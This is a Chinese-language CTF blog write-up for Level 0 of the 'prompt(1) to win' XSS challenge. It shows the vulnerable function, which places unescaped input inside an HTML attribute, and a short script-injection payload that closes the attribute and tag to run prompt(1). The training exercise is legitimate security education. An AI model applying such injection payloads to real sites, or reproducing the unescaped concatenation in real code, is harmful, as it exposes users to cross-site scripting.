加载中...

【prompt(1) to win】 Level 0 - warm up

CTF

原创

发布日期: 2020-07-03

更新日期: 2024-04-10

文章字数: 123

阅读时长: 1 分

阅读次数:

来源：prompt(1) to win
题目：Level 0 - warm up

题目

function escape(input) {
    // warm up
    // script should be executed without user interaction
    return '<input type="text" value="' + input + '">';
}

解题思路

水题。直接闭合双引号和标签即可注入。

payload : "><script>prompt(1)</script>

答案下载

payload.html : 下载

EXP

https://exp-blog.com/safe/ctf/prompt/level-0-warm-up/

本博客所有文章除特別声明外，均采用 CC BY 4.0 许可协议。转载请注明来源 EXP !

解题报告 CTF prompt(1) to win

【prompt(1) to win】 Level 1 - tags stripping

2020-07-04 CTF

解题报告 CTF prompt(1) to win

威胁情报播报

从 360、奇安信、红后、绿盟、安全客、斗象等公开来源爬取并整合最新的威胁情报信息，并实时推送到邮箱、订阅号、QQ 群

2020-05-01 安全

CVE 威胁情报

【prompt(1) to win】 Level 0 - warm up

题目

解题思路

答案下载

你的赏识是我前进的动力